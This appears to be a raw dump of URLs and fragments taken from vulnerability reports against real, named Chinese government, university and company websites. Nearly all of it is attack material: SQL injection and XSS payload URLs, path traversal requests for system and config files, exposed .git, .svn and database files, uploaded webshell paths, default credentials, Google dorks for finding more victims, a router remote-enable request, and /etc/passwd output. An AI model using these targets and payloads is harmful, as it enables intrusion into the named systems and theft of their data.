http://dec.jlu.edu.cn/baozi//WhatyEditor/edit.htm http://119.48.218.181/jludec/WhatyEditor/edit.htm http://222.168.41.249//jludec/WhatyEditor/edit.htm http://202.198.17.229/jludec/WhatyEditor/edit.htm http://dec.jlu.edu.cn/baozi/incoming/114115175241_test.jspx http://119.48.218.181/jludec/incoming/11411694824_test.jspx http://222.168.41.249/jludec/incoming/11411694824_test.jspx http://202.198.17.229/jludec/incoming/11411694824_test.jspx http://220.178.10.84:8081/ShenBaoOA/dwInfoAction_toAddPassword.action?pk= http://61.153.3.19/Ty_Web_Sms/Web/Ty_Login.aspx http://jsjjx.njfu.edu.cn/boarddetail.asp?id1=32 http://sygl.njfu.edu.cn/zhanshi.aspx?centid=32 http://szbks.njfu.edu.cn/paperedit.asp?paperno= http://szbks.njfu.edu.cn/userinfoview.asp?userid= http://**.**.**/userpages/SerchList.aspxParams=%27 http://app.open.56.com/ http://app.open.56.com/wp http://app.open.56.com/dede/plus/open56.php http://app.open.56.com/phpcms http://app.open.56.com/discuz http://app.open.56.com/discuz/ http://app.open.56.com/discuz/install/index.php http://www.ahzfcg.gov.cn:93/ http://58.241.17.92:8004/login.asp http://xwb.hebtu.edu.cn:80/xwxx/manager/8xwxx.asp?ksh=xxx http://www.xgjt.gov.cn/xxfb/zskshow_1.jsp?unid=6E03130A002326AB151A00136BDB3057 http://dzll.haier.net:8888/providerUnlock.jsp http://mail.12306.cn/app/mail/login http://www2.sdwz.cn/netcr/liebiao/content.php?cid=9&aid=19%27 http://www.xgxz.gov.cn/NoticeDetail.aspx?type=notice&id=2442 http://dynamic.help.xunlei.com/getArticlesByClass.do?callback=jsonp1419913979216&_=1419913980510&contentno=0001000100020001 http://romgame.gfan.com/index.php/gtphone?areacode=* http://t2.fanwe.net/wb_e7c77e55cdecd1e3.txt http://www.lingmov.com/ inurl:/page/Product_Details.asp?P_ID= http://www.shxinduan.com//Netsys/NetsysData/NetsysData.mdb http://www.xinhaowl.com//Netsys/NetsysData/NetsysData.mdb http://www.zhengjia-speed.com/Netsys/NetsysData/NetsysData.mdb http://www.yudu56.com.cn//Netsys/NetsysData/NetsysData.mdb http://www.aswlgs.com//Netsys/NetsysData/NetsysData.mdb http://www.szbilian.com//Netsys/NetsysData/NetsysData.mdb http://www.baishang56.com//Netsys/NetsysData/NetsysData.mdb http://www.dhl58.com//Netsys/NetsysData/NetsysData.mdb http://www.guanlin.net.cn//Netsys/NetsysData/NetsysData.mdb http://zlgc.gzhu.edu.cn:8080/proapply/login.do http://www.fesco.com.cn/newcms/turnpage/turnpagesearch1.jsp?sortid=0&column_id=0&pageno=0&pagesize=40&searchColumn=&searchValue=&template_id=0&wherestr=1 http://shop.lenovo.com.cn http://www.517lppz.cn/map.aspx?id=1 http://mtp.cnpc.com.cn/ http://cn.trustmobi.com/for_business/for_business_MDM.html test:test http://stv.letv.com/w/m/supportmatch.action?mid=*&uid=null http://www.365art.com/www.rar http://www.dyp2p.com/ http://www.bda.gov.cn/cms/www/index.html http://www.bdaot.com/abroad/enterpriseLoginAction.do?saction=login http://mtp.cnpc.com.cn http://www.sfn.cn/ https://payment.ttyfund.com/utty/show/accountmanage/resetpwd/resetPwd1.action http://shop.lenovo.com.cn http://t.cn/RZLX0zG http://t.cn/RZLX0zG http://app.t.dianping.com/.git/config http://wap.dianping.com/.git/config http://stat.api.dianping.com/.git/config http://stat.api.dianping.com/.git http://stat.api.dianping.com/.git http://220.249.191.172/ http://220.249.191.172/console http://teccard.suda.edu.cn/indexmanagerLogin.action http://t.cn/******* http://i.meituan.com/account/address?cevent=imt%2Faccount%2Fmyinfo%2Faddress http://t.cn/******* http://developer.dianping.com/.git/config http://www.cmatec.net/rencai/upload/,直接看到上传的内容 http://**.**.**/cyrc/mailDossier_urlQueryList_maildossier_urlMailDossierList.action http://dzb.cqrz.edu.cn www.shangceng.com.cn inurl:/?storyshow1/id www.shangceng.com.cn http://www.tjshangceng.com/admin/ http://www.sczshz.com/admin/?main.html inurl:/?storyshow1/id/ http://www.sczshz.com/admin/sys/mantpls/do/?Mantpls-save.html http://book.suzhouculture.cn:8080/SzDuxiu/GoDuxiu.action http://180.168.192.34,又见JBOSS,顺便说一句 http://pksy.xjtu.edu.cn/newsDetail.php?newsID=300 http://t.cn/******* http://t.cn/******* http://ucc.damai.cn/ http://ucc.damai.cn/data中看到backup_d5cac3目录,点击进去就是数据库备份的sql http://***.com/fileUpload.do文件是不存在的,要找到他对应的类,然后反编译才可以看到源码。 http://member.95081.com/passport/logon!logout.action http://www.nongyou.com.cn/ http://218.58.124.131:8003/ckq/hnzcout.aspx?tname=中央商务片区&CountryName=小庄社区 http://123.134.189.60:8022/ckq/hnzcout.aspx?tname=牛泉镇&CountryName=杨小庄 http://218.56.99.84:8003/ckq/hnzcout.aspx?tname=双杨镇&CountryName=西张村 http://60.217.72.17:7048/ckq/hnzcout.aspx?tname=辛寨镇&CountryName=田家 http://222.134.154.214:8001/ckq/hnzcout.aspx?tname=西里镇&CountryName=姚宅 http://jwh.tanljgzx.gov.cn/ckq/hnzcout.aspx?tname=宁阳经济开发区&CountryName=邢庄村 http://jwh.tanljgzx.gov.cn/ckq/hnzcout.aspx?tname=宁阳经济开发区&CountryName=邢庄村 http://222.134.154.214:8001/ckq/hnzcout.aspx?tname=西里镇&CountryName=姚宅 http://60.211.179.22:9080/wscgs/xwl.do http://123.130.246.26:9080/wscgs/xwl.do http://www.bzwscgs.com:9080/wscgs/xwl.do http://www.lcwscgs.com/wscgs/xwl.do http://221.2.145.164:9080/wscgs/xwl.do http://58.59.39.43:9080/wscgs/xwl.do http://www.lycgs.gov.cn:9080/wscgs/xwl.do http://www.dygajj.gov.cn:9080/wscgs/xwl.do http://218.59.228.162/wscgs/xwl.do http://60.211.179.22:9080/wscgs/xwl.do http://123.130.246.26:9080/wscgs/xwl.do http://www.56888.net/search/lineslist/ http://www.56888.net/search/lineslist/?ddlStartProvince=36&ddlEndProvince=35&ddlStartCity=40016&ddlEndCity=40002&trantype=%u9646%u8FD0 https://din.qbe.com/dinweb2/logon2/logon.action http://jingyan.baidu.com/search?ssid=&from=&bd_page_type=2&uid=&pu=&st=5&os=&word=%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E&click=top#0 http://www.apkbus.com/portal.php?mod=portalcp&ac=article&catid=7&op=edit&aid=46781 http://erp.suning.com.cn/epp/登陆处的用户名处未过滤。 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin http://www.whaty.com Demo:http://210.14.133.43/ inurl:jsp http://www.e-health.org.cn/news/xinxi.jsp?ids=82 http://yuancheng.stys.com.cn/tycj/tycj/news.jsp?id=29 http://sv11.wljy.sdu.edu.cn/sduwy/sduwy/news_detail.jsp?id=9216 http://edu.cdpsn.org.cn/zcl/zcl/news/info.jsp?id=671 http://hdsy.demo.webtrn.cn/upol/upol/college/tzgg/tzgg_02.jsp?id=8664 inurl:WhatyEditor http://www.hust-snde.com/hust/WhatyEditor/insertFile.jsp http://www.hust-snde.com/hust/incoming/_/test.jspx http://mdmec.ccom.edu.cn/music//WhatyEditor/insertFile.jsp http://mdmec.ccom.edu.cn/music/incoming/_/1.jspx http://etraining.e-health.org.cn/jsw/WhatyEditor/insertFile.jsp http://etraining.e-health.org.cn/jsw/jsw/firstpage/kqpx/yanshi//114115152740_test.jspx http://dispub.bjtu.edu.cn/ohomework/WhatyEditor/insertFile.jsp http://dispub.bjtu.edu.cn/ohomework/incoming../1418966933561.jsp http://www.swust.net.cn/xnkj/WhatyEditor/insertFile.jsp http://www.swust.net.cn/xnkj/incoming..//114115125419_jsp.jsp http://202.116.42.209/hnyjs/WhatyEditor/insertFile.jsp http://202.116.42.209/hnyjs/incoming/_/1141119121350.jspx http://yuancheng.stys.com.cn/tycj/tycj/zsbm.jsp?id=1 http://www.yanjiao.com/bbs/portal.php?mod=portalcp&ac=article&from_idtype=tid&from_id=464909 inurl:/product.php?type_id= http://www.bj-junyitai.com/product.php?type_id=60 http://www.sqlmap.org www.bj-jun http://172.16.10.223:8080/bwie/login.do http://172.16.10.223:8080/bwie/bwietwo/jsp/xyzsgl/xyzsglController.do?m=rzindex http://172.16.10.223:8080/bwie/left.jsp http://www.sftm.com.cn/event_detail.asp?ClassID=0204&id=839 http://service.faw-mazda.com/Spareparts/index.php/shangkujingpin_ryjc/detail?id=329 http://document.thinkphp.cn/manual_3_2.html#model_instance http://www.faw.com.cn/down.jsp?Tempfile=/index.jsp http://gztd.faw.com.cn/down.jsp?Tempfile=././faw_online/admin.jsp http://qnzx.faw.com.cn/down.jsp?Tempfile=down.jsp http://gztd.faw.com.cn/jsjd.jsp?Main=jsjd&Type=1%22%20onmouseover%3dprompt%28222222%29%20bad%3d%22 http://218.78.217.95:7001/defaultroot/InfoViewIframeAction.do?historyId=1&action=delHistory http://njjl.gzagri.gov.cn/query/query_toQuery.action www.3721inn.com www.baotoo.com www.czslyydd.com www.maikr.com www.maitix.com www.piao.com.cn http://117.34.65.22:8080/ncmsca_new/main.html# http://oneniceapp.com/ http://110.17.162.183:8081/app!home.do http://nc.xhlbdc.com/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://nc.pinggugroup.com:81/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://123.232.105.202/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://nc55.hspark.com/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://erp.minyoun.com/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://zfkg.com:8081/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://61.175.97.50/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://zfkg.com:8081/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://erp.minyoun.com/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://nc.xhlbdc.com/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://nc.pinggugroup.com:81/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://61.175.97.50/epp/core/public/singleplandetail.jsp?pk=1012F41000000000WA2V http://180.153.27.7:81/ http://erp.suning.com.cn/epp/ http://erp.suning.com.cn/epp/core/manageui.jsp?ctrl=nc.web.epp.k0160.EntryPublishController&delegator=nc.web.epp.k0160.EntryPublishDelegator&roleid=0A&pageId=H0K30160 http://www.wooyun.org/bugs/wooyun-2014-089487/trace/ca338e20666fbe79e87f32643c939075 http://zone.wooyun.org/content/16772 http://www.hr135.com/ask/index.php?order=add_time http://zhidao.baidu.com/doctor/list/answer?pn=0&rn=10&uid=1343437935&_=1420000464481 http://baike.baidu.com/api/mall/getgoodslist?t=1420003371672&goods_class_id=&goods_price_begin=5001&goods_price_end=10000&goods_order_by=goods_price&goods_had_exchange=&goods_order_type=2&goods_type=1&page=1&word=&showInStock=true http://www.openbase.com.cn/download/login.asp http://zone.wooyun.org/content/16772 http://www.smartcome.com/,此地址选用了百度云加速,我在浏览器中输入 www.smartcome.com/index.php?id=1 www.smartcome.com/index.php?id=1 http://zone.wooyun.org/content/16772 inurl:article_show.asp?id= http://www.chaoguangyue.com/article_show.asp?id=138 http://www.sqlmap.org www.chaogu http://support.gzbg100.cn/sysadmin/Login.aspx http://www.gzbg100.cn/thirdpage/scenicdetails.aspx?id=90002%27 http://www.gzbg100.cn/preferentialPage/ly_iyouhui.aspx?cityid=0451%E2%80%99 http://www.gzbg100.cn/preferentialPage/ly_iyouhui_dy.aspx?pkcode=0451-0313-0001%27 http://xqht.minshengec.com/msadmin/login.jhtml www.histarter.com http://erp.suning.com.cn/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction http://gh.cosco-logistics.com.cn/ghoa//mvnforum/index https://tender.wanda.cn/COST/WebService_N/CMWCost/CMWContractVOWebService.asmx,调用的2个byname的service都有注入,想着如果只修补了一个,还能捡个漏,结果修复了一个注入,另一个byname的service直接去掉了。机智! https://vendor.wanda.cn/tender/home.aspx https://vendor.wanda.cn/tender/ https://vendor.wanda.cn/tender/trace.axd https://vendor.wanda.cn/tender/Trace.axd?id=18 coding:utf-8 http://api.open.baidu.com/pae/ecosys/page/lottery?type=video&wd=%E5%BA%9F%E6%9F%B4%E5%85%84%E5%BC%9F%E7%AC%AC%E4%BA%8C%E5%AD%A3&nowType=%22%3C/a%3E%3Cimg%20src=http://www.baidu.com/img/bdlogo.png%3E&site=iqiyi http://www.nongyou.com.cn/ http://218.56.99.84:8003/newSymSum/VillagePersonal2.aspx?tname=太河镇&CountryName=东同古村 http://222.135.109.70:8200/newSymSum/VillagePersonal2.aspx?tname=泽库镇&CountryName=辛立庄村 http://123.134.189.60:8022/newSymSum/VillagePersonal2.aspx?tname=牛泉镇&CountryName=西泉河 http://222.135.76.147:8200/newSymSum/VillagePersonal2.aspx?tname=斥山办事处&CountryName=西苏家村 http://218.58.124.131:8003/newSymSum/VillagePersonal2.aspx?tname=中央商务片区&CountryName=魏家社区 http://218.56.40.229:8037/newSymSum/VillagePersonal2.aspx?tname=毕郭镇&CountryName=庙子夼村 http://218.56.40.229:8037/newSymSum/VillagePersonal2.aspx?tname=毕郭镇&CountryName=庙子夼村 http://www.gtongsudi.com/newsdetail.asp?ids=199 http://gaztbw.gov.cn/fckeditor/editor/fckeditor.html http://www.nongyou.com.cn/ http://222.135.76.147:8200/ckq/jwhkzjdlist.aspx?tname=宁津办事处&CountryName=所前王家 http://60.217.72.17:7117/ckq/jwhkzjdlist.aspx?tname=山头办&CountryName=河北西社区 http://218.58.124.131:8003/ckq/jwhkzjdlist.aspx?tname=综合保税物流片区&CountryName=北岭村 http://218.56.40.229:8013/ckq/jwhkzjdlist.aspx?tname=昆嵛镇&CountryName=滩上 http://218.56.99.84:8003/ckq/jwhkzjdlist.aspx?tname=昆仑镇&CountryName=河石坞村 http://222.134.154.214:8001/ckq/jwhkzjdlist.aspx?tname=大张庄镇&CountryName=胜利村 http://222.134.154.214:8001/ckq/jwhkzjdlist.aspx?tname=大张庄镇&CountryName=胜利村 http://222.240.200.21:82/ http://222.240.200.21/ http://222.240.200.21:82/FindPassWord.aspx http://222.240.200.21:82/Admin/Home.aspx http://222.240.200.21/ http://www.nongyou.com.cn/ http://221.2.149.47:8100/jubao/left.aspx http://222.135.109.70:8100/jubao/left.aspx http://123.134.189.60:8012/jubao/left.aspx http://218.56.40.229:8020/jubao/left.aspx http://222.135.127.190:7000/jubao/left.aspx http://222.135.127.190:7000/jubao/StatisticalAnalysisChart.aspx?pid= http://221.2.149.47:8100/jubao/StatisticalAnalysisChart.aspx?pid= http://222.135.109.70:8100/jubao/StatisticalAnalysisChart.aspx?pid= http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid= http://218.56.40.229:8020/jubao/StatisticalAnalysisChart.aspx?pid= http://123.134.189.60:8012/jubao/StatisticalAnalysisChart.aspx?pid= php:193 inurl:browsebgxz.do?method= http://www.gygxzw.gov.cn:8066/browsebgxz.do?method=dept&deptid=556631684 http://61.189.156.73/browsebgxz.do?method=dept&deptid=009420415 http://58.42.229.238/browsebgxz.do?method=dept&deptid=009430488 http://www.sinanxzfw.gov.cn/browsebgxz.do?method=dept&deptid=009566537 http://58.42.241.14:6778/browsebgxz.do?method=dept&deptid=00941049y http://www.tlsp.net/browsebgxz.do?method=dept&deptid=122711214 http://hxasc.cn/browsebgxz.do?method=dept&deptid=009420247 http://www.jzsxzxndzjcw.gov.cn/browsebgxz.do?method=dept&deptid=999999999999999 http://www.hunan.gov.cn/hxbxxds/ssbb/201412/t20141230_1196349.html http://www.jiacetest.com/about.html http://www.fsmeixi.com/uploadfiles/201303271623290.jsp http://www.jspkongjian.net/ http://fhed.v061.10000net.cn/kefuadmin1/newjspkongjian/fuwuqi.jsp http://www.jiacetest.com/js/wuyun.jsp inurl:morebrowsnews.do http://www.gygxzw.gov.cn:8066/morebrowsnews.do?type=27 http://61.189.156.73/morebrowsnews.do?type=2 http://web161666.5udns.cn/morebrowsnews.do?type=1 http://www.yjxzfw.com.cn/morebrowsnews.do?type=53 http://jjjc.sqxz.gov.cn/morebrowsnews.do?type=15 http://58.42.241.14:6778/morebrowsnews.do?type=100 http://jiubang.kingtrans.cn/ http://szxy.kingtrans.net/ http://yfd.kingtrans.cn/ http://jiubang.kingtrans.cn/ http://newehong.gnway.cc:9898/Logon?action=initMenu http://sfex.kingtrans.cn/ http://szzn.kingtrans.net/ http://th.skyex.com.cn http://md.kingtrans.net/ http://cloud.189.cn/t/bayEZfFzqYva http://www.steelchina.cn/newsinfo.php?id=109 http://www.steelchina.cn/newsinfo.php?id=109 http://**.**.**/A430124chss/chss.html http://**.**.**/wwwroot.rar http://hi.hunteron.com/portal.php?mod=portalcp&ac=article&catid=8&op=edit&aid=58 http://dqkh.cmda.org.cn/ http://exam.cmda.org.cn/Login/Login.aspx http://zone.wooyun.org/content/16772 http://www.alijijinhui.org/index.php?id=1 http://www.alijijinhui.org/index.php?id=1 http://www.alijijinhui.org/index.php?id=1 http://www.alijijinhui.org/index.php?id=1 http://www.alijijinhui.org/index.php?id=1 http://www.alijijinhui.org/index.php?id=1 http://www.alijijinhui.org/index.php?id=1 http://www.alijijinhui.org/index.php?id=1 http://tieba.baidu.com/tb/static-common/swf/upload.swf?onFlashInitComplete=alert%28document.body.innerHTML%29 http://tieba.baidu.com/tb/static-encourage/widget/firework/swf/firework_hallowmas_94fe0c1.swf?closeFlash=alert%28document.body.innerHTML%29 http://www.99iwork.com/ http://www.juanct.com/ http://61.233.42.22:28017/ http://player.mbox.sogou.com/FlashMP3Player.swf?isFlashReady=function%28%29{alert%28123%29 http://www.cycb.com/review.do?method=col&rid=34439 http://www.sqlmap.org www.cycb.c http://bbs.zmifi.com/uc_server http://**.**.**/ http://m.bistu.edu.cn/newapi/yellowpage.php?action=tel&catid=12 http://mail.yanji.edu.sh.cn/oa/EduPlate/RES/BatInputDB.aspx?DirPath=%5c%5cUpload%5cOATSUploads http://gmxx.nh.edu.sh.cn/EduPlate/RES/BatInputDB.aspx?DirPath=%5c%5cUpload%5cBackup http://202.158.162.185/EduPlate/RES/BatInputDB.aspx?DirPath=%5c%5cUpload%5c http://www.whei.cn/EduPlate/RES/BatInputDB.aspx?DirPath=%5c%5cUpload%5cBackup http://www.jflxx.fxedu.cn/EduPlate/RES/BatInputDB.aspx?DirPath=%5c%5cUpload%5cBackup http://www.ygxx.hpe.cn/EduPlate/RES/BatInputDB.aspx?DirPath=%5c%5cUpload%5c http://218.78.245.29/EduPlate/RES/BatInputDB.aspx?DirPath=%5c%5cUpload%5cBackup http://www.shjzzx.com/EduPlate/RES/BatInputDB.aspx?DirPath=%5c%5cUpload%5cBackup http://www.ypgz.edu.sh.cn/EduPlate/RES/BatInputDB.aspx?DirPath=%5c%5cUpload%5c http://www.cpt.gov.cn/Database/zf11.mdb http://www.cpt.gov.cn/admin/Admin_Login.asp http://www.cpt.gov.cn/editor.asp http://zwgk.wuhai.gov.cn/servlet/FileDownload?filepath=C%3a%5cwindows%5csystem32%5cdrivers%5cetc%5chosts inurl:http://www.ynrsksw.cn/ynrsks/examineerecord/ http://www.zmdslsj.cn//admin/admin_news_pl_view.asp?action=save&id=11 http://www.hhxz.gov.cn/application/zwdt/query.jsp http://www.hhxz.gov.cn/application/zwdt/query.jsp http://219.148.21.1:8081/ http://jxjy.shsmu.edu.cn/ http://app.wanda.cn/newspaper/iView/login.html http://hope.haier.com/ http://hope.haier.com/topic/other/topicBoddys www.shopwind.cn http://www.meiliwangluo.com//fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp http://www.pugok.com/shop//fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp http://www.yongminglihui.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp http://www.ygxr.me/shop//fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp http://www.zsrlhf.com/shop//fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp http://www.shunfengu.com//fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp http://drops.wooyun.org/papers/548 http://hzjt.huazhou.gov.cn/admin/adminlogin.asp http://www.xichu.net/edu/count/col_stat.php?colid=44 http://chongqing.fangdd.com/ http://www.tlgins.com.tw/index.action http://218.78.217.95:7001/defaultroot/voiture_manager/Voituregetsource.jsp?voitureid=696360&type=chgMotorMan inurl:Per_Search_Base.asp http://www.shuobozhaopin.com/Part/Per_Search_Base.asp http://gaobu.dgjob.cn/Part/Per_Search_Base.asp http://www.smrc.cn/Part/Per_Search_Base.asp http://www.jobjp.cn/Part/Per_Search_Base.asp http://www.0566job.com/Part/Per_Search_Base.asp http://www.lsrc114.com/Part/Per_Search_Base.asp http://www.fhclm.com/Part/Per_Search_Base.asp http://www.hmcgj.com//admin/admin_news_pl_view.asp?action=save&id=1 http://www.purchase.gov.cn/xygh1.0/egp/cz/wsjy/xyspcg/xzsp/pmcx/ListXysplbIndex,$DirectLink_0.direct?sp=Sff8080813b64837f013b922336973553 http://mail.yueyang.gov.cn/include/config.inc http://www.czkczx.com/FCKeditor/editor/fckeditor.html http://www.czkczx.com/ban.asp http://me.qdwenxue.com/profile/info.aspx http://sq.qidian.com/space/showauthorspace.aspx http://www.fs121.com/notesInfo.aspx?c=0304&id=1147 http://www.fs121.com/yxsm_Index.aspx?m=proxy&a=show&q_url= http://www.fs121.com/yingxiang.aspx?aciton=sx&eTime=&sTime=&sortType=u http://www.fs121.com/qxkpwd.aspx?code=080402 http://www.fs121.com/weather/focn.aspx?T=map&cid= http://www.fs121.com/%22AwshourfRain.aspx?sid= http://www.fs121.com/VISLine.aspx?t=1&n= http://gsics.nsmc.cma.gov.cn/loginAction!login.action http://gsics.nsmc.cma.gov.cn/test.txt http://www.17u.com/destination/city_lvyou_4602.html http://******* http://www.qhdjtj.gov.cn/manage/login.php http://wooyun.org/bugs/wooyun-2014-076565 http://www.z029.com/ inurl:php/LY_message.php?job= http://www.htgrape.com/php/LY_message.php?job=add http://www.xdblq.com/php/LY_message.php?job=add http://www.forstar.com.cn/php/LY_message.php?job=add http://www.zryhsx.com/php/LY_message.php?job=add http://www.xayzw.com/php/LY_message.php?job=add http://www.xasaihu.com/php/LY_message.php?job=add http://www.xaqsw.com/php/LY_message.php?job=add http://www.laosundajia.com/php/LY_message.php?job=add http://www.guangrensi.com/php/LY_message.php?job=add http://www.htgrape.com/php/LY_message.php?job=add http://www.xasaihu.com/php/LY_message.php?job=add http://www.anchensw.com/php/LY_message.php?job=add http://www.silian.com.cn/php/LY_message.php?job=add http://www.sundagentleman.com/FT/php/LY_message.php?job=add http://www.chengji-express.com/newshow.asp?id=483 http://csc2013.buaa.edu.cn/content.php?id=9 http://www.gwbn.cq.cn/ http://www.gwbn.cq.cn/special.asp?columnid=31 www.gwbn.cq.cn http://www.tcc-npfpc.org.cn/list.aspx?id=0101 http://dwgk.rcjt.gov.cn/admin/admin_login.asp http://www.zinch.cn/cwl_2013.log?flush=js,css http://sj.cityonmap.com/upgrade/login.action http://120.132.39.35:8082/bj_agent/login/login.action http://www.cicro.com/ inurl:list2.jsp?tag_id= http://www.funan.gov.cn/appeal/list2.jsp?tag_id=8 http://www.shcgb.cn/appeal/list2.jsp?tag_id=9 http://hudong.hanzhong.gov.cn/appeal/list2.jsp?tag_id=9 http://sss.jzpolice.gov.cn/appeal/list2.jsp?tag_id=&sq_title=&model_id=13&pur_id=&start_time=&cur_page=9 http://www.hblr.gov.cn/appeal/list2.jsp?tag_id=&sq_title=&model_id=17&pur_id=&start_time=&cur_page=1 http://202.109.244.242/.svn/entries http://www.wzecloud.com/ZBdeploy.php?_cls=user&_act=selectedArea&areaId=1 inurl:newgoods.asp?action_key_order=news http://www.anxi-chaye.cn/shop//admin/upLoad_bm.asp?a=uploadfile http://www.hongchapifa.com//admin/upLoad_bm.asp?a=uploadfile http://www.gsbiaopai.cn//admin/upLoad_bm.asp?a=uploadfile http://tianyacha.com/shop//admin/upLoad_bm.asp?a=uploadfile http://www.tjxbz.com/shop//admin/upLoad_bm.asp?a=uploadfile http://www.mygoodtea.cn//admin/upLoad_bm.asp?a=uploadfile http://www.dunxing.net/shop//admin/upLoad_bm.asp?a=uploadfile http://www.axxzch.com/shop//admin/upLoad_bm.asp?a=uploadfile http://xingjitea.com/shop//admin/upLoad_bm.asp?a=uploadfile http://axwenxiang.com/shop//admin/upLoad_bm.asp?a=uploadfile http://chaye138.com//admin/upLoad_bm.asp?a=uploadfile http://www.szjc160.cn//admin/upLoad_bm.asp?a=uploadfile http://www.cha95.com//admin/upLoad_bm.asp?a=uploadfile http://herb-remedy.com//admin/upLoad_bm.asp?a=uploadfile http://chaducha.com/tieguanyin//admin/upLoad_bm.asp?a=uploadfile http://www.620026.com/shop//admin/upLoad_bm.asp?a=uploadfile inurl:news_more.asp?lm2= http://tms.mshcpt.net http://tms.mshcpt.net:7007/eoms width:980px;height:600px;margin:0 width:300px width:60px width:80%;height:60% http://hywh.bnu.edu.cn/ http://minisite.youku.com/xiaorenwu/show_v.php?vid=XODQ0ODI4MTM2 www.fsrsks.com http://cci.scu.edu.cn/ http://cci.scu.edu.cn//admin/login.asp www.wczx.jinedu.cn为例,通用搜索内容:锐捷网络有限公司 http://www.china-tibetan.com http://www.szqsfj.com/index.htm http://www.wczx.jinedu.cn等多个网站都存在一个COOKIES通用的情况。。。这是万能COOKIES http://jpk.scuec.edu.cn/yaoxue1/about.php?type=82 http://www.17u.com/activity/17u-fengchenghe/Afengchenghe.ashx?type=GetPhone&p=13888888888%27 https://122.226.150.69/admin/fckeditor/editor/filemanager/upload/php/upload.php https://122.226.150.69/admin/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media https://122.226.150.69/vpnweb/userfiles/media/2011.php http://61.237.239.144/ictrcp/base/index.action http://58.68.226.208/cacti user:admin,pass:admin http://58.68.226.208/ http://www.rayli.com.cn/ http://58.68.226.153:8089/login/login.action http://58.68.226.153:8089/login/login.action http://58.68.226.208/phpMyAdmin/ http://58.68.226.208/ http://www.rayli.com.cn/ http://xiangmai.rayli.com.cn/.svn/entries http://xiangmai.rayli.com.cn/index.php?/admin/login http://jinan.anjuke.com/community/subscribe/sendtophone/226122?r=0.38136472278977346 http://www.masxzfwzx.gov.cn/test/ http://campus.xunlei.com/ http://www.huntingpr.com/ mx://res/options/index.htm mx://res/options/index.htm,之后只要打开浏览器,xss代码就能被执行。 http://sns.web.maxthon.cn/browser/index.php?session_id=1 http://utf7.ml/t/maxthon1.js http://utf7.ml/t/maxthon1.js,js的代码如下 http://www.55.la:80/ www.55.la http://ask.533.com/public/upload/53abd86fdca51.jpg http://ask.533.com/public/upload/53abd86fdca51.jpg/a.php http://ask.533.com/home/questlist/index/cid/111 http://ask.533.com/home/questlist/index/cid/acu3754%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3754 http://fc.tcl.com:6888/admin/ www.966009.com/client/business/shownetdot.aspx?city=1&dot_id=586 exp:http://192.168.0.1:8081/cgi-bin-igd/netcore_get.cgi?mode_name=netcore_get&no=no http://192.168.0.1:8081/cgi-bin-igd/netcore_set.cgi?mode_name=netcore_set&remote_enable=1&remote_port=8083&save_web_config=save http://localhost/yun/?/admin/template/update/Y2FydC5jYXJ0bGlzdC5odG1s# http://localhost/yun/?/admin/template/update/eC5waHA=# http://fans.51job.com http://fans.51job.com/payservice/fans/ajax/weibo_ajax.php http://fans.51job.com/payservice/fans/ajax/weibo_ajax.php?type=8&optype=2&replyid=¬iceid=150110020596857&transmit=0&reply=0&content=转播评论的内容&interviews_transmit=0&sExtendTransmitType=&bExtendTransmit=0&sina_authorize=0&qq_authorize=0 http://www.baidu.com/dan.php?c=IZ0-5HDYnW0snWRzPWT0IgF_5y9YIZ0lQzqYQhP8QdFpNyqhRAn0&k=s_1028238 http://request.help.sohu.com/help/form http://124.238.218.78 http://124.238.218.78/report/spxxcxlb.jsp http://czswsjd.com/2052/Aspx/DownLoad.ashx?name=wooyuntest.txt&path=../../web.config http://czswsjd.com/2052/Aspx/DownLoad.ashx?path=hhhhhhh http://www.sino-manager.com/ http://www.sino-manager.com/robots.txt http://www.sino-manager.com//Pages/Administrate1/ http://www.xmqcz.com/getmsgb.php?qno=7556989 http://www.xmqcz.com/getmsgb.php?qno=7556989 http://www.xmqcz.com/bbs/index.php inurl:Article_Print.asp?ArticleID= http://www.dct.com.cn/Article_Print.asp?ArticleID=745 http://www.dct.com.cn/Article_Class.asp?ClassID=1 http://www.wzqjks.com/Article_Print.asp?ArticleID=504 http://www.wzqjks.com/Article_Class.ASP?ClassID=8 http://www.lishou.com/dl/Article_Print.asp?ArticleID=3925 http://www.lishou.com/dl/Article_Class.asp?ClassID=1 http://www.jt8421.com/Article_Print.asp?ArticleID=137 http://www.jt8421.com/Article_Class.asp?ClassID=2 http://www.jhsyzx.com/gms/Article_Print.asp?ArticleID=1855 http://www.jhsyzx.com/gms/Article_Class.asp?ClassID=1 